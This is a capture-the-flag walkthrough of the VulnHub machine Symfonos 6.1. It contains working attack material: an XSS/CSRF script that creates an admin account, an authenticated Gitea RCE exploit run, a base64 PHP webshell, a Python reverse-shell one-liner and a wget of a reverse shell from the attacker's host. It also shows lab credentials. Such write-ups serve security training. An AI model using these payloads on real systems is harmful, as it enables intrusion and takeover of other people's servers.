Overview
This machine begins w/ a web application (flyspray 1.0) that is susceptible to XSS + CSRF on its post comments which will create an admin account for the attacker when admin visits the post causing the malicious script to reflect onto the admin’s browser.
The admin account that is created reveals credentials for the gitea web applicatio hosted on TCP/3000. Also, gitea (1.1.0 to 1.12.5) is susceptible to authenticated remote code execution, allowing us to obtain a shell
For the privilege escalation part, we have to escalate our privileges twice, to achilles and to root. Achilles user is obtain via reused credentials and root is obtained via sudo misconfiguration whereby achilles is allowed to run GO as a superuser, allowing us to run a go reverse shell to obtain root.
Walkthrough
Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
# Nmap 7.92 scan initiated Thu Feb 10 21:59:50 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Symfonos-6.1/192.168.110.24/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Symfonos-6.1/192.168.110.24/scans/xml/_full_tcp_nmap.xml 192.168.110.24
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #fcfcfc; color: #333333; margin: 0; padding:0; \}\nh1 \{ font-size: 1\.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; \}\nh1, p \{ padding-left: 10px; \}\ncode\.url \{ background-color: #eeeeee; font-family:monospace; padding:0 2px;\}\n</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #ffffff; color: #000000; \}\nh1 \{ font-family: sans-serif; font-size: 150%; background-color: #9999cc; font-weight: bold; color: #000000; margin-top: 0;\}\n</style>'
adjust_timeouts2: packet supposedly had rtt of -459256 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -459256 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -460360 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -460360 microseconds. Ignoring time.
Nmap scan report for 192.168.110.24
Host is up, received arp-response (0.00071s latency).
Scanned at 2022-02-10 21:59:51 +08 for 267s
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 0e:ad:33:fc:1a:1e:85:54:64:13:39:14:68:09:c1:70 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDf/gc994jzNxH6zt01DmK3gjycek/l6sVS6dfftHPUGVQt/lyQ4WxKgw77iwAHLBHkcXnd3+F3Z0vt9bAxWosreMK9dh9JMCqNitKGbs3v+GbsBUuJClmERzTqbaL/9PqGOGfbbg3JPgVBAhJpF9SUs2pV2mSrxTgNM5faDf7S5qGzdIn6m8ivP70MtGKdF3ogns26ZIU5kvkqUdqUJb/V7HaJjnpDkgQC56Fcy9+FkLHDqsFuBOg4WLuQI+1N7jWHzFedWQ5knzVs78dtlPPGdnrqERThIov8Ki3Fz10X4KOsRccAqbosMWAmhJqTbQPle9qag222SqC9EXCikU6d
| 256 54:03:9b:48:55:de:b3:2b:0a:78:90:4a:b3:1f:fa:cd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFGrBeScWRqBYfW+MJFyVReI/bSSuEsJBllEMyV1lCt9FWPMMFl8konSIH5WWc0r/9LolA9yFDFLDs2xpF9+hhA=
| 256 4e:0c:e6:3d:5c:08:09:f4:11:48:85:a2:e7:fb:8f:b7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO14/cung3UzL0a3rbctlN+MUZnXon2oaNflvb7ISJQW
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
3000/tcp open ppp? syn-ack ttl 64
| fingerprint-strings:
| GenericLines, Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=1a02f70307a7eadb; Path=/; HttpOnly
| Set-Cookie: _csrf=R9-J7iqrqkstRS8rupP2JoxIsso6MTY0NDUzMDQwMjg3OTgyNDg2MA; Path=/; Expires=Fri, 11 Feb 2022 22:00:02 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 10 Feb 2022 22:00:02 GMT
| <!DOCTYPE html>
| <html lang="en-US">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title> Symfonos6</title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <script>
| ('serviceWorker' in navigator) {
| navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
| console.info('ServiceWorker registration successful with scope: ', registrat
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=65f01c822d2e3550; Path=/; HttpOnly
| Set-Cookie: _csrf=73HOm-6Ii9FgFA2-DHDNERrTlVo6MTY0NDUzMDQwNzkwODUyNjA3OA; Path=/; Expires=Fri, 11 Feb 2022 22:00:07 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Thu, 10 Feb 2022 22:00:07 GMT
| <!DOCTYPE html>
| <html lang="en-US">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Symfonos6</title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <script>
| ('serviceWorker' in navigator) {
| navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
|_ console.info('ServiceWorker registration successful
3306/tcp open mysql syn-ack ttl 64 MariaDB (unauthorized)
5000/tcp open upnp? syn-ack ttl 64
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain
| Date: Thu, 10 Feb 2022 22:00:32 GMT
| Content-Length: 18
| page not found
| GenericLines, Hello, Help, Kerberos, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain
| Date: Thu, 10 Feb 2022 22:00:02 GMT
| Content-Length: 18
| page not found
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/plain
| Date: Thu, 10 Feb 2022 22:00:17 GMT
| Content-Length: 18
|_ page not found
2 services unrecognized despite returning data. If you know the service/version, please submit the
TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 192.168.110.24
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 10 22:04:18 2022 -- 1 IP address (1 host up) scanned in 268.53 seconds
TCP/80 (HTTP)
FFUF - common.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.24/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.html [Status: 403, Size: 207, Words: 15, Lines: 9]
.hta.php [Status: 403, Size: 210, Words: 15, Lines: 9]
.htaccess.html [Status: 403, Size: 216, Words: 15, Lines: 9]
[Status: 200, Size: 251, Words: 26, Lines: 22]
.htaccess.txt [Status: 403, Size: 215, Words: 15, Lines: 9]
.htpasswd [Status: 403, Size: 211, Words: 15, Lines: 9]
.htpasswd.html [Status: 403, Size: 216, Words: 15, Lines: 9]
.htaccess [Status: 403, Size: 211, Words: 15, Lines: 9]
.htpasswd.txt [Status: 403, Size: 215, Words: 15, Lines: 9]
.htaccess.php [Status: 403, Size: 215, Words: 15, Lines: 9]
.hta.html [Status: 403, Size: 211, Words: 15, Lines: 9]
.hta [Status: 403, Size: 206, Words: 15, Lines: 9]
.hta.txt [Status: 403, Size: 210, Words: 15, Lines: 9]
cgi-bin/ [Status: 403, Size: 210, Words: 15, Lines: 9]
cgi-bin/.html [Status: 403, Size: 215, Words: 15, Lines: 9]
.htpasswd.php [Status: 403, Size: 215, Words: 15, Lines: 9]
flyspray [Status: 301, Size: 239, Words: 14, Lines: 8]
index.html [Status: 200, Size: 251, Words: 26, Lines: 22]
index.html [Status: 200, Size: 251, Words: 26, Lines: 22]
posts [Status: 301, Size: 236, Words: 14, Lines: 8]
:: Progress: [18460/18460] :: Job [1/1] :: 30 req/sec :: Duration: [0:00:12] :: Errors: 0 ::
cgi-bin/
flyspray
posts
TCP/3000
FFUF - common.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit]
└─# ffuf -u http://192.168.110.24:3000/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.php,.html,.txt'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.24:3000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 200, Size: 10163, Words: 717, Lines: 307]
admin [Status: 302, Size: 34, Words: 2, Lines: 3]
avatars [Status: 302, Size: 31, Words: 2, Lines: 3]
css [Status: 302, Size: 27, Words: 2, Lines: 3]
debug [Status: 200, Size: 160, Words: 18, Lines: 5]
explore [Status: 302, Size: 37, Words: 2, Lines: 3]
img [Status: 302, Size: 27, Words: 2, Lines: 3]
issues [Status: 302, Size: 34, Words: 2, Lines: 3]
js [Status: 302, Size: 26, Words: 2, Lines: 3]
notifications [Status: 302, Size: 34, Words: 2, Lines: 3]
vendor [Status: 302, Size: 30, Words: 2, Lines: 3]
:: Progress: [18460/18460] :: Job [1/1] :: 366 req/sec :: Duration: [0:00:48] :: Errors: 0 ::
admin
TCP/5000
FFUF
- No directories enumerated
Initial Foothold
TCP/5000 - 404 page
- Proceed to
http://192.168.110:5000
TCP/3000 (HTTP) - Gitea
- View enumerated directories
admin
Gitea Version 1.11.4
- Others
- Redirected to login panel
- Error page
- Proceed to
Explore -> Users
, found some usernames- Usernames:
achilles
zayotic
- Usernames:
Search exploits for
Gitea Version 1.11.4
Exploit Title Path Gitea 1.12.5 - Remote Code Execution (Authenticated) multiple/webapps/49571.py - We have to obtain some credentials before we can use this exploit
- Vulnhub: DevGuru 1 also exploits Gitea Authenticated RCE
TCP/80 (HTTP) - Flyspray 1.0 XSS/CSRF
- View enumerated directories
cgi-bin/
- Could not enumerate any
.cgi
files
- Could not enumerate any
flyspray
flyspray
posts
- Create a wordlist from
/posts
1 2 3
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit] └─# cewl $ip/posts -w cewl_post.txt CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
- Register user
testing
& login - After browsing browsing through
/flyspray
, found its versionflyspray 1.0
Search exploits for
flyspray 1.0
Exploit Title Path FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery php/webapps/41918.txt - Try
php/webapps/41918.txt
- Register an account
- Add a comment under
symfonos bug
- Login & edit
- Real Name:
"><script src="http://192.168.110.4/script.js"></script>
- Real Name:
- Create
script.js
that will create an admin account, hacker:123456781 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
var tok = document.getElementsByName('csrftoken')[0].value; var txt = '<form method="POST" id="hacked_form" action="index.php?do=admin&area=newuser">' txt += '<input type="hidden" name="action" value="admin.newuser"/>' txt += '<input type="hidden" name="do" value="admin"/>' txt += '<input type="hidden" name="area" value="newuser"/>' txt += '<input type="hidden" name="user_name" value="hacker"/>' txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>' txt += '<input type="hidden" name="user_pass" value="12345678"/>' txt += '<input type="hidden" name="user_pass2" value="12345678"/>' txt += '<input type="hidden" name="real_name" value="root"/>' txt += '<input type="hidden" name="email_address" value="root@root.com"/>' txt += '<input type="hidden" name="verify_email_address" value="root@root.com"/>' txt += '<input type="hidden" name="jabber_id" value=""/>' txt += '<input type="hidden" name="notify_type" value="0"/>' txt += '<input type="hidden" name="time_zone" value="0"/>' txt += '<input type="hidden" name="group_in" value="1"/>' txt += '</form>' var d1 = document.getElementById('menu'); d1.insertAdjacentHTML('afterend', txt); document.getElementById("hacked_form").submit();
- Start a python HTTP server hosting
script.js
1 2 3
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit] └─# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
- Wait for administrator to visit the post,
script.js
is queried1 2 3 4
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit] └─# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 192.168.110.24 - - [11/Feb/2022 01:10:00] "GET /script.js HTTP/1.1" 304 -
- Login w/ hacker:12345678
- achilles:h2sBr9gryBunKdF9
TCP/3000 (HTTP) - Gitea RCE (Authenticated)
- Start a listener
- Use the exploit we found earlier
multiple/webapps/49571.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit] └─# python3 49571.py -t http://$ip:3000 -u achilles -p h2sBr9gryBunKdF9 -I 192.168.110.4 -P 1337 _____ _ _______ / ____(_)__ __| CVE-2020-14144 | | __ _ | | ___ __ _ | | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution | |__| | | | | __/ (_| | \_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5 [+] Starting exploit ... hint: Using 'master' as the name for the initial branch. This default branch name hint: is subject to change. To configure the initial branch name to use in all hint: of your new repositories, which will suppress this warning, call: hint: hint: git config --global init.defaultBranch <name> hint: hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and hint: 'development'. The just-created branch can be renamed via this command: hint: hint: git branch -m <name> Initialized empty Git repository in /tmp/tmp.hAJ2fkCy4d/.git/ [master (root-commit) cae0214] Initial commit 1 file changed, 1 insertion(+) create mode 100644 README.md Enumerating objects: 3, done. Counting objects: 100% (3/3), done. Writing objects: 100% (3/3), 241 bytes | 241.00 KiB/s, done. [+] Exploit completed !
- Manual exploit
TCP/22 (SSH)
- Obtain a more stable shell by copying your private key into git’s
.ssh/authorized_keys
1 2
[git@symfonos6 tmp]$ cd /home/achilles [git@symfonos6 ~]$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeiQIVUawX98au7XzxT8GIdr2FNcZxtxpyDU/+TuwyCyoyWeM6iRyy2f+1xRqeca7dsaPIsPtp7nKwcpDzMCH9uXMKZFXBU4GedcDgL5rFMWONq6GdivuY+oflxlukJrnFn8Y/roNqjtwntXKnV+1dkCXjI8zLly7V1nt7W3U+kLzUgem3uso18RCoCTJLf+XlrF0PGuiuIGP3zZVuadrYm5VdDwbgOSUcUL3Zu+FU1W1wC2QE0EhhgBWXrwBQuIZiq4rFRo9RuxoFl42YyFgGugmV405/ROAXypR+M7vT5JnUt/7Zs4Y2lmapKY8rS93EPZIfurBCzB2YUNyNBbrZHyxAj/5I9iLqdRPvyI22NoRTz7U9s= root@kali" > .ssh/authorized_keys
- SSH w/ your
id_rsa
1 2 3 4
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit] └─# ssh git@$ip -i /root/.ssh/id_rsa Last login: Thu Feb 10 20:39:02 2022 from 192.168.110.4 [git@symfonos6 ~]$
- Head to Privilege Escalation
Initial Foothold (2) - Exploit API
- Instead of exploiting Gitea itself w/
49571.py
, exploit the api atTCP/5000
- Login Gitea w/ achilles:h2sBr9gryBunKdF9
- Proceed to
Repositories -> symfonos-api
, it contains the source code for the API running atTCP/5000
- I am not familiar with golang, so I am not 100% sure what the code is doing.
- After viewing the code, we are able to insert do RCE
api.go
- access the
api
athttp://$ip:5000/ls2o4g
- access the
posts.go
- Before we can POST a webshell, we must be authenticated first
- We can POST a webshell at
/ls2o4g/api/v1.0/posts
auth.go
- We are able to authenticate at
/ls2o4g/api/v1.0/auth/login
- We are able to authenticate at
index.php
htmlspecialchars
, characters are escaped
- Obtain a shell by bypassing
htmlspecialchars
& inserting a web shell, refered to a writeup to create the json request.- Authenticate
1 2 3
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1] └─# curl -H "Content-Type: application/json" "http://$ip:5000/ls2o4g/v1.0/auth/login" -d '{"username":"achilles","password":"h2sBr9gryBunKdF9"}' {"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDUxNTQwOTUsInVzZXIiOnsiZGlzcGxheV9uYW1lIjoiYWNoaWxsZXMiLCJpZCI6MSwidXNlcm5hbWUiOiJhY2hpbGxlcyJ9fQ.Jd-JaDANHB02bKU80EaSvdlXG-ggfDRxR4ly36IG8FM","user":{"display_name":"achilles","id":1,"username":"achilles"}}
- Base64 encode webshell to bypass
htmlspecialchars
1 2
echo '<?php system($_GET["cmd"]); ?>' | base64 PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
- Insert a webshell to
post
1 2 3
curl -H "Content-Type: application/json" -X PATCH "http://$ip:5000/ls2o4g/v1.0/posts/1" -b "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDUxNTYwOTIsInVzZXIiOnsiZGlzcGxheV9uYW1lIjoiYWNoaWxsZXMiLCJpZCI6MSwidXNlcm5hbWUiOiJhY2hpbGxlcyJ9fQ.K2htM7cr61qekEVl4ueWKvblmQAmTbMMg7LaQgPvIb4" -d $'{"text":"file_put_contents(\'shell.php\', base64_decode(\'PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==\'));"}' {"created_at":"2020-04-02T04:41:22-04:00","id":1,"text":"file_put_contents('shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg=='));","user":{"display_name":"achilles","id":1,"username":"achilles"}}
- Webshell is inserted to the body of
/post
, however, the code is not executed yet.
- Webshell is inserted to the body of
- Execute our payload by visting
/post
1 2
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1] └─# curl http://192.168.110.25/posts/
- Obtain a shell
1 2
# Enter this in your browser http://192.168.110.31/posts/shell.php?cmd=python%20-c%20%27socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.4",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")%27
- Authenticate
- Alternative, bypassing
htmlspecialchars
by downloading a webshell directly onto the webserver- Insert php code to download
php-reverse-shell.php
into the body of/post
1 2 3 4
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit/api] └─# curl -H "Content-Type: application/json" -X PATCH "http://$ip:5000/ls2o4g/v1.0/posts/1" -b "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDUxNTYwOTIsInVzZXIiOnsiZGlzcGxheV9uYW1lIjoiYWNoaWxsZXMiLCJpZCI6MSwidXNlcm5hbWUiOiJhY2hpbGxlcyJ9fQ.K2htM7cr61qekEVl4ueWKvblmQAmTbMMg7LaQgPvIb4" -d $'{"text":"system(\'wget 192.168.110.4/php-reverse-shell.php\')"}' --header "Content-Type: application/json" {"created_at":"2022-02-10T23:15:45.778410883-05:00","id":6,"text":"system('wget 192.168.110.4/php-reverse-shell.php')","user":{"display_name":"achilles","id":1,"username":"achilles"}}
- Start a python http server hosting
php-reverse-shell.php
1 2 3
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit/api] └─# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
- Execute the php code to download
php-reverse-shell.php
1 2 3 4 5 6 7
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1] └─# curl http://192.168.110.25/posts/ ┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit/api] └─# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 192.168.110.25 - - [11/Feb/2022 04:17:21] "GET /php-reverse-shell.php HTTP/1.1" 200 -
- Execute
php-reverse-shell.php
1 2
┌──(root💀kali)-[~/vulnHub/Symfonos-6.1/192.168.110.24/exploit/api] └─# curl http://$ip/posts/php-reverse-shell.php
- Insert php code to download
Privilege Escalation
Achilles - Via Creds Found
- Switch to Achilles w/ achilles:h2sBr9gryBunKdF9
Root - Via Sudo
- Check for sudo access
1 2 3 4 5 6 7 8 9 10
[achilles@symfonos6 git]$ sudo -l Matching Defaults entries for achilles on symfonos6: !visiblepw, always_set_home, match_group_by_gid, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User achilles may run the following commands on symfonos6: (ALL) NOPASSWD: /usr/local/go/bin/go [achilles@symfonos6 git]$
- Create
go
reverse shell - Transfer to target
- Execute reverse shell
1
[achilles@symfonos6 tmp]$ sudo /usr/local/go/bin/go run /tmp/rev.go
- Root shell obtained
- Root Flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
cat proof.txt Congrats on rooting symfonos:6! ,_---~~~~~----._ _,,_,*^____ _____``*g*\"*, / __/ /' ^. / \ ^@q f [ @f | @)) | | @)) l 0 _/ \`/ \~____ / __ \_____/ \ | _l__l_ I } [______] I ] | | | | ] ~ ~ | | | | | Contact me via Twitter @zayotic to give feedback!
Comments powered by Disqus.